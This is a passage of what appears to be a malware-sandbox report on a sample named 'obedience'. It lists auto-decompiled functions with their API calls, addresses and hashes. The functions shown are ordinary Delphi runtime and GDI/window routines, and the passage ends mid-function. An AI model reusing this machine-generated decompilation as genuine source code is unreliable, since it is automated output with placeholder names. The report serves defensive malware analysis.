      • Instruction Fuzzy Hash: 6B314174F04218DFEB00EFA5D941AAEBBB5FB49310F50856AE914BB380C674A941CB65
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00401CF4 Relevance: 9.1, APIs: 6, Instructions: 72COMMON
      Download Yara Rule
      C-Code - Quality: 74%
      			E00401CF4() {
				void* _v8;
				intOrPtr* _v12;
				void* _t13;
				void* _t15;
				intOrPtr* _t18;
				void* _t31;
				void* _t37;
				intOrPtr _t42;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t44 = _t46;
				_t47 = _t46 + 0xfffffff8;
				if( *0x4905c0 == 0) {
					return _t13;
				} else {
					_push(_t44);
					_push(E00401DE8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t47;
					if( *0x490049 != 0) {
						_push(0x4905c8);
						L004013FC();
					}
					 *0x4905c0 = 0;
					_t15 =  *0x490620; // 0x808628
					LocalFree(_t15);
					 *0x490620 = 0;
					_t18 =  *0x4905e8; // 0x809c5c
					_v12 = _t18;
					while(0x4905e8 != _v12) {
						VirtualFree( *(_v12 + 8), 0, 0x8000);
						_v12 =  *_v12;
					}
					E00401498(0x4905e8);
					E00401498(0x4905f8);
					E00401498(0x490624);
					_t31 =  *0x4905e0; // 0x809628
					_v8 = _t31;
					while(_v8 != 0) {
						 *0x4905e0 =  *_v8;
						LocalFree(_v8);
						_t37 =  *0x4905e0; // 0x809628
						_v8 = _t37;
					}
					_pop(_t42);
					 *[fs:eax] = _t42;
					_push(0x401def);
					if( *0x490049 != 0) {
						_push(0x4905c8);
						L00401404();
					}
					_push(0x4905c8);
					L0040140C();
					return 0;
				}
			}














      0x00401cf5
      0x00401cf7
      0x00401d01
      0x00401df2
      0x00401d07
      0x00401d09
      0x00401d0a
      0x00401d0f
      0x00401d12
      0x00401d1c
      0x00401d1e
      0x00401d23
      0x00401d23
      0x00401d28
      0x00401d2f
      0x00401d35
      0x00401d3c
      0x00401d41
      0x00401d46
      0x00401d66
      0x00401d59
      0x00401d63
      0x00401d63
      0x00401d75
      0x00401d7f
      0x00401d89
      0x00401d8e
      0x00401d93
      0x00401d9a
      0x00401da1
      0x00401daa
      0x00401daf
      0x00401db4
      0x00401db7
      0x00401dbf
      0x00401dc2
      0x00401dc5
      0x00401dd1
      0x00401dd3
      0x00401dd8
      0x00401dd8
      0x00401ddd
      0x00401de2
      0x00401de7
      0x00401de7

      APIs
      • RtlEnterCriticalSection.KERNEL32(004905C8,00000000,00401DE8), ref: 00401D23
      • LocalFree.KERNEL32(00808628,00000000,00401DE8), ref: 00401D35
      • VirtualFree.KERNEL32(?,00000000,00008000,00808628,00000000,00401DE8), ref: 00401D59
      • LocalFree.KERNEL32(00000000,?,00000000,00008000,00808628,00000000,00401DE8), ref: 00401DAA
      • RtlLeaveCriticalSection.KERNEL32(004905C8,00401DEF,00808628,00000000,00401DE8), ref: 00401DD8
      • RtlDeleteCriticalSection.KERNEL32(004905C8,00401DEF,00808628,00000000,00401DE8), ref: 00401DE2
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
      • String ID:
      • API String ID: 3782394904-0
      • Opcode ID: 50acf7075c2b9cf25f1cc865c92697bc66a4d2ab7712ad971b840031530edc13
      • Instruction ID: 34fe96d851ba9aa5fcda36ec3b5851fb49b3a1fa2286b40976e443080b7ff627
      • Opcode Fuzzy Hash: 50acf7075c2b9cf25f1cc865c92697bc66a4d2ab7712ad971b840031530edc13
      • Instruction Fuzzy Hash: F0216675A00604BFEB51EBA9E885B6D7BE0EB19324F5100BBE404E72F1D738A940DB1C
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00427DD8 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
      Download Yara Rule
      C-Code - Quality: 45%
      			E00427DD8(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _t29;
				struct tagBITMAPINFO* _t32;
				intOrPtr _t39;
				struct HBITMAP__* _t43;
				void* _t46;

				_t32 = __ecx;
				_t43 = __eax;
				E00427C88(__eax, _a4, __ecx);
				_v12 = 0;
				_push(0);
				L00407280();
				_v16 = 0;
				_push(_t46);
				_push(0x427e75);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				if(__edx != 0) {
					_push(0);
					_push(__edx);
					_t29 = _v16;
					_push(_t29);
					L00407420();
					_v12 = _t29;
					_push(_v16);
					L004073F0();
				}
				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(0x427e7c);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v16);
					L00407420();
				}
				return DeleteDC(_v16);
			}











      0x00427de1
      0x00427de5
      0x00427dee
      0x00427df5
      0x00427df8
      0x00427dfa
      0x00427dff
      0x00427e04
      0x00427e05
      0x00427e0a
      0x00427e0d
      0x00427e12
      0x00427e14
      0x00427e16
      0x00427e17
      0x00427e1a
      0x00427e1b
      0x00427e20
      0x00427e26
      0x00427e27
      0x00427e27
      0x00427e45
      0x00427e4b
      0x00427e4e
      0x00427e51
      0x00427e5a
      0x00427e5c
      0x00427e61
      0x00427e65
      0x00427e66
      0x00427e66
      0x00427e74

      APIs
        • Part of subcall function 00427C88: GetObjectA.GDI32(?,00000054), ref: 00427C9C
      • 73BEA590.GDI32(00000000), ref: 00427DFA
      • 73BEB410.GDI32(?,?,00000000,00000000,00427E75,?,00000000), ref: 00427E1B
      • 73BEB150.GDI32(?,?,?,00000000,00000000,00427E75,?,00000000), ref: 00427E27
      • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00427E3E
      • 73BEB410.GDI32(?,00000000,00000000,00427E7C,?,00000000), ref: 00427E66
      • DeleteDC.GDI32(?), ref: 00427E6F
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B410$A590B150BitsDeleteObject
      • String ID:
      • API String ID: 3837315262-0
      • Opcode ID: 15518999b184c60d9ef3a8c8f52ffc7f597b2291debbefea5ec5f1d7c60b1202
      • Instruction ID: 50ad24d120df1170e5449d3e730bf90d1863c18885817c2408e14c7d9b906119
      • Opcode Fuzzy Hash: 15518999b184c60d9ef3a8c8f52ffc7f597b2291debbefea5ec5f1d7c60b1202
      • Instruction Fuzzy Hash: 8B118275F082147BDB10DBA9DC41F5FB7ECDB48704F5180AABA14E7281D678AD008768
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00441700 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00441700(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x48ebd8; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x48ebd8; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x48ebd8; // 0x0
				SetPropA(_a4,  *0x490aea & 0x0000ffff, _t27);
				_t31 =  *0x48ebd8; // 0x0
				SetPropA(_a4,  *0x490ae8 & 0x0000ffff, _t31);
				_t35 =  *0x48ebd8; // 0x0
				 *0x48ebd8 = 0;
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}










      0x00441705
      0x00441708
      0x00441710
      0x00441716
      0x00441728
      0x0044173d
      0x00441758
      0x00441758
      0x0044175d
      0x0044176f
      0x00441774
      0x00441786
      0x00441797
      0x0044179c
      0x004417ac
      0x004417b4

      APIs
      • SetWindowLongA.USER32 ref: 00441728
      • GetWindowLongA.USER32 ref: 00441733
      • GetWindowLongA.USER32 ref: 00441745
      • SetWindowLongA.USER32 ref: 00441758
      • SetPropA.USER32(?,00000000,00000000), ref: 0044176F
      • SetPropA.USER32(?,00000000,00000000), ref: 00441786
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: LongWindow$Prop
      • String ID:
      • API String ID: 3887896539-0
      • Opcode ID: 448ade05ee1e9ca47653a8de3d6cc964fe8d8abdd4dd27d12ac6f786a841e099
      • Instruction ID: 5cfb6933cf2a1a1025ea8312e11c37851685907db9f48b4bfc5932e3fd350c58
      • Opcode Fuzzy Hash: 448ade05ee1e9ca47653a8de3d6cc964fe8d8abdd4dd27d12ac6f786a841e099
      • Instruction Fuzzy Hash: CA11EF75604204BFEF00DF9DDC85EDA37A8AB08364F108565F915DB2A1D734F980DB68
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004275F4 Relevance: 9.1, APIs: 6, Instructions: 55COMMON
      Download Yara Rule
      C-Code - Quality: 87%
      			E004275F4(struct HDC__* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				short* _t15;
				void* _t18;
				struct HDC__* _t23;
				void* _t26;
				short* _t31;
				short* _t32;

				_t31 = 0;
				 *_t32 = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E00402CEC(_t26, __ecx << 2,  &_v1036);
				} else {
					_push(0);
					L00407280();
					_t23 = __eax;
					_t18 = SelectObject(__eax, __eax);
					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
					SelectObject(_t23, _t18);
					DeleteDC(_t23);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E0042755C(_t32) == 0) {
						E004273EC( &_v1036, _v1038 & 0x0000ffff);
					}
					_t15 = _t32;
					_push(_t15);
					L004072B8();
					_t31 = _t15;
				}
				return _t31;
			}













      0x004275ff
      0x00427601
      0x00427609
      0x00427643
      0x00427651
      0x0042760b
      0x0042760b
      0x0042760d
      0x00427612
      0x00427616
      0x0042762f
      0x00427636
      0x0042763c
      0x0042763c
      0x0042765c
      0x00427664
      0x0042767a
      0x0042767a
      0x0042767f
      0x00427681
      0x00427682
      0x00427687
      0x00427687
      0x00427694

      APIs
      • 73BEA590.GDI32(00000000,00000000,?,?,0042B1F3,?,?,?,?,00429DD7,00000000,00429E63), ref: 0042760D
      • SelectObject.GDI32(00000000,00000000), ref: 00427616
      • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,0042B1F3,?,?,?,?,00429DD7), ref: 0042762A
      • SelectObject.GDI32(00000000,00000000), ref: 00427636
      • DeleteDC.GDI32(00000000), ref: 0042763C
      • 73BEA8F0.GDI32(?,00000000,?,?,0042B1F3,?,?,?,?,00429DD7,00000000,00429E63), ref: 00427682
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ObjectSelect$A590ColorDeleteTable
      • String ID:
      • API String ID: 1056449717-0
      • Opcode ID: f023a3aa0607719df7c6fff00a2b46cf0e205a819bcbb28c157be9f047eebf0d
      • Instruction ID: a2141247f874ad801d69f0ae8385d9faad6a70220d4825ccee21831697022378
      • Opcode Fuzzy Hash: f023a3aa0607719df7c6fff00a2b46cf0e205a819bcbb28c157be9f047eebf0d
      • Instruction Fuzzy Hash: FF019B6160C32026D210776A9C47F5F71AC8FC0764F44C92FB944A72C1E57C984493AB
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00426CCC Relevance: 9.0, APIs: 6, Instructions: 43COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00426CCC(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0042632C( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0042632C( *((intOrPtr*)(_t36 + 0x14))));
				if(E0042640C( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0042566C(E004262F0( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0042566C(E004262F0( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}




      0x00426ccd
      0x00426cd8
      0x00426cea
      0x00426cf9
      0x00426d33
      0x00426d44
      0x00426cfb
      0x00426d0d
      0x00426d1e
      0x00426d1e

      APIs
        • Part of subcall function 0042632C: CreateBrushIndirect.GDI32(?), ref: 004263D6
      • UnrealizeObject.GDI32(00000000), ref: 00426CD8
      • SelectObject.GDI32(?,00000000), ref: 00426CEA
      • SetBkColor.GDI32(?,00000000), ref: 00426D0D
      • SetBkMode.GDI32(?,00000002), ref: 00426D18
      • SetBkColor.GDI32(?,00000000), ref: 00426D33
      • SetBkMode.GDI32(?,00000001), ref: 00426D3E
        • Part of subcall function 0042566C: GetSysColor.USER32(?), ref: 00425676
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
      • String ID:
      • API String ID: 3527656728-0
      • Opcode ID: 0e2e68183134a0f7bba3af10b8e8c1f1e0586bbbdd862bf785d011091185e2ca
      • Instruction ID: 91340de21108a0da904373c65ca48e0442af7e16a09023ef019208b95398bf07
      • Opcode Fuzzy Hash: 0e2e68183134a0f7bba3af10b8e8c1f1e0586bbbdd862bf785d011091185e2ca
      • Instruction Fuzzy Hash: 6BF0CDB17001109BDB00FFBAE9C6E0B7B9D9F0430978484AAB908DF19BC97DE8104779
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042F804 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 187COMMON
      Download Yara Rule
      C-Code - Quality: 51%
      			E0042F804(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char* _v20;
				intOrPtr* _v24;
				intOrPtr* _v28;
				char _v32;
				char _v36;
				signed int _v37;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				intOrPtr* _t76;
				intOrPtr _t85;
				intOrPtr _t99;
				intOrPtr _t119;
				char _t120;
				intOrPtr* _t121;
				void* _t124;
				intOrPtr _t139;
				intOrPtr _t144;
				intOrPtr _t155;
				intOrPtr _t156;
				signed int _t161;
				void* _t163;
				void* _t164;
				void* _t166;
				void* _t167;
				intOrPtr _t168;

				_t166 = _t167;
				_t168 = _t167 + 0xffffffc0;
				_v48 = 0;
				_v52 = 0;
				_v44 = 0;
				_v8 = __eax;
				_push(_t166);
				_push(0x42fa41);
				_push( *[fs:eax]);
				 *[fs:eax] = _t168;
				if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
					_v12 =  *((intOrPtr*)(_v8 + 0x10));
					goto L19;
				} else {
					_t119 = E00403BC0(1);
					 *((intOrPtr*)(_v8 + 0x10)) = _t119;
					_v12 = _t119;
					_push(_t166);
					_push(0x42f9fb);
					_push( *[fs:edx]);
					 *[fs:edx] = _t168;
					_t76 =  *0x48f9d4; // 0x48e0c8
					if( *_t76 != 2) {
						_t120 = 2;
						_v37 = 5;
					} else {
						_t120 = 6;
						_v37 = 4;
					}
					_v32 = 0;
					_push( &_v36);
					_push( &_v32);
					_push(0);
					_push(0);
					_t161 = _v37 & 0x000000ff;
					_push(_t161);
					_push(0);
					_push(_t120);
					L0042ED00();
					if(_v32 != 0) {
						_v24 = E00402ACC(_v32, _t124, 0);
						_push(_t166);
						_push(0x42f9ea);
						_push( *[fs:edx]);
						 *[fs:edx] = _t168;
						_push( &_v36);
						_push( &_v32);
						_push(_v32);
						_t85 = _v24;
						_push(_t85);
						_push(_t161);
						_push(0);
						_push(_t120);
						L0042ED00();
						if(_t85 != 0) {
							_v28 = _v24;
							_t163 = _v36 - 1;
							if(_t163 >= 0) {
								_t164 = _t163 + 1;
								do {
									if(_v37 != 4) {
										_t121 = _v28;
										_v16 =  *((intOrPtr*)(_t121 + 4));
										_v20 = E0042EE08( &_v16);
										while( *_v20 != 0) {
											_t99 =  *0x48f5ec; // 0x423b58
											E00406A3C(_t99, 0,  &_v52);
											_v68 =  *_t121;
											_v64 = 6;
											_v60 = _v20;
											_v56 = 6;
											E0040A164(_v52, 1,  &_v68,  &_v48);
											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x10)))) + 0x3c))(E0042EF14(0, 1, _v20,  *_t121));
											_v20 = E0042EE08( &_v16);
										}
										_v28 = _v28 + 0x14;
									} else {
										E00404C38( &_v44,  *_v28);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x10)))) + 0x3c))(E0042EF14(0, 1, 0,  *_v28));
										_v28 = _v28 + 0xc;
									}
									_t164 = _t164 - 1;
								} while (_t164 != 0);
							}
							_pop(_t144);
							 *[fs:eax] = _t144;
							_push(0x42f9f1);
							return E00402AFC(_v24);
						} else {
							E0040447C();
							_pop(_t155);
							 *[fs:eax] = _t155;
							goto L19;
						}
					} else {
						_pop(_t156);
						 *[fs:eax] = _t156;
						L19:
						_pop(_t139);
						 *[fs:eax] = _t139;
						_push(0x42fa48);
						return E00404A64( &_v52, 3);
					}
				}
			}




































      0x0042f805
      0x0042f807
      0x0042f80f
      0x0042f812
      0x0042f815
      0x0042f818
      0x0042f81d
      0x0042f81e
      0x0042f823
      0x0042f826
      0x0042f830
      0x0042fa23
      0x00000000
      0x0042f836
      0x0042f842
      0x0042f847
      0x0042f84a
      0x0042f84f
      0x0042f850
      0x0042f855
      0x0042f858
      0x0042f85b
      0x0042f863
      0x0042f870
      0x0042f875
      0x0042f865
      0x0042f865
      0x0042f86a
      0x0042f86a
      0x0042f87b
      0x0042f881
      0x0042f885
      0x0042f886
      0x0042f888
      0x0042f88a
      0x0042f88e
      0x0042f88f
      0x0042f891
      0x0042f892
      0x0042f89b
      0x0042f8b2
      0x0042f8b7
      0x0042f8b8
      0x0042f8bd
      0x0042f8c0
      0x0042f8c6
      0x0042f8ca
      0x0042f8ce
      0x0042f8cf
      0x0042f8d2
      0x0042f8d3
      0x0042f8d4
      0x0042f8d6
      0x0042f8d7
      0x0042f8de
      0x0042f8f5
      0x0042f8fb
      0x0042f8fe
      0x0042f904
      0x0042f905
      0x0042f909
      0x0042f944
      0x0042f94a
      0x0042f955
      0x0042f9be
      0x0042f977
      0x0042f97c
      0x0042f986
      0x0042f989
      0x0042f990
      0x0042f993
      0x0042f99f
      0x0042f9b0
      0x0042f9bb
      0x0042f9bb
      0x0042f9c6
      0x0042f90b
      0x0042f927
      0x0042f938
      0x0042f93b
      0x0042f93b
      0x0042f9ca
      0x0042f9ca
      0x0042f905
      0x0042f9d3
      0x0042f9d6
      0x0042f9d9
      0x0042f9e9
      0x0042f8e0
      0x0042f8e0
      0x0042f8e7
      0x0042f8ea
      0x00000000
      0x0042f8ea
      0x0042f89d
      0x0042f89f
      0x0042f8a2
      0x0042fa26
      0x0042fa28
      0x0042fa2b
      0x0042fa2e
      0x0042fa40
      0x0042fa40
      0x0042f89b

      APIs
      • 73802130.WINSPOOL.DRV(00000002,00000000,?,00000000,00000000,?,?,00000000,0042F9FB,?,00000000,0042FA41,?,00000000), ref: 0042F892
      • 73802130.WINSPOOL.DRV(00000002,00000000,?,?,?,?,?,00000000,0042F9EA,?,00000002,00000000,?,00000000,00000000,?), ref: 0042F8D7
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: 73802130.
      • String ID: X;B$tzA$B
      • API String ID: 2384860516-3490348117
      • Opcode ID: 8620eb779e87f9c6371ea520bc3ca2c7d3658a830e49e9319ab66336d0e57859
      • Instruction ID: e5fe25428e6e30322374bc7cf80b7661a98e321c6739a1446e78aaa5a9c63bd6
      • Opcode Fuzzy Hash: 8620eb779e87f9c6371ea520bc3ca2c7d3658a830e49e9319ab66336d0e57859
      • Instruction Fuzzy Hash: D4718F71A04218AFDB01DF95E881B9EBBF9FB48310FA1847AE400E7351D738AD05CB69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0045E820 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148windowCOMMON
      Download Yara Rule
      C-Code - Quality: 91%
      			E0045E820(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t97;
				void* _t110;
				intOrPtr _t112;
				void* _t115;

				_t93 = 0;
				_v20 = 0;
				_t112 = __edx;
				_t92 = __eax;
				_push(_t115);
				_push(0x45e9e6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t115 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E004582B8(_t39, 0, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t112 != 0 && ( *(_t112 + 0x1c) & 0x00000008) != 0) {
						_t112 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t112;
					if(_t112 != 0) {
						E00422780(_t112, _t92);
					}
					if(_t112 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E0044B45C(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E0044B158(_t92), 0);
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E0044B45C(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E0044B158(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E0044B45C(_t92) != 0) {
